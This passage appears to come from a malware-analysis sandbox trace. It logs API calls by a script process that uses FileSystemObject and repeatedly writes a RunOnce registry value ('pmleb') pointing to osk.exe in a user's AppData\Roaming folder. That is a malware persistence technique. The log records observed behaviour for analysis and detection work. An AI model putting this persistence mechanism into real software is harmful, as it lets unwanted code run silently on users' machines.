pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.758] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x15 [0077.758] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.758] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.758] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.758] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.758] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.758] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.758] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.759] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.759] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.759] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.759] RegCloseKey (hKey=0x280) returned 0x0 [0077.759] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.759] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.759] SetTimer (hWnd=0x20280, nIDEvent=0x2015, uElapse=0xa, lpTimerFunc=0x0) returned 0x2015 [0077.759] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.834] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.834] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.834] KillTimer (hWnd=0x20280, uIDEvent=0x2015) returned 1 [0077.835] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.835] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.835] IUnknown:Release (This=0x787518) returned 0x1 [0077.835] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.835] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.835] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.835] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.835] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.835] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.835] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.835] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.836] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.836] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x16 [0077.836] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.836] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x17 [0077.836] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.837] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x16 
[0077.837] ??2@YAPAXI@Z () returned 0x2b511b0 [0077.837] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.837] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.837] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.837] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.837] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.837] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.837] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.837] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.837] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.837] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.838] RegCloseKey (hKey=0x280) returned 0x0 [0077.838] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.838] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.838] SetTimer (hWnd=0x20280, nIDEvent=0x2016, uElapse=0xa, lpTimerFunc=0x0) returned 0x2016 [0077.838] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.849] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.849] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.850] KillTimer (hWnd=0x20280, uIDEvent=0x2016) returned 1 [0077.850] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.850] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.850] IUnknown:Release (This=0x787518) returned 0x1 [0077.850] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.850] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.850] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, 
[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.850] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.850] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.850] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.850] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.850] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, 
[2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.851] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.851] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x17 [0077.851] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.851] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x18 [0077.851] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.851] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x17 [0077.852] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.852] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) 
returned 0x0 [0077.852] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.852] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.852] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.852] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.852] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.852] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.852] lstrlenA 
(lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.852] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.852] RegCloseKey (hKey=0x280) returned 0x0 [0077.852] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.852] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.852] SetTimer (hWnd=0x20280, nIDEvent=0x2017, uElapse=0xa, lpTimerFunc=0x0) returned 0x2017 [0077.853] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.865] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.865] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.865] KillTimer (hWnd=0x20280, uIDEvent=0x2017) returned 1 [0077.865] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.865] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.866] IUnknown:Release (This=0x787518) returned 0x1 [0077.866] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.866] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.866] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, 
wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.866] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.866] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.866] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.866] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.866] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.866] 
FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.866] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x18 [0077.866] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.866] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x19 [0077.866] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | 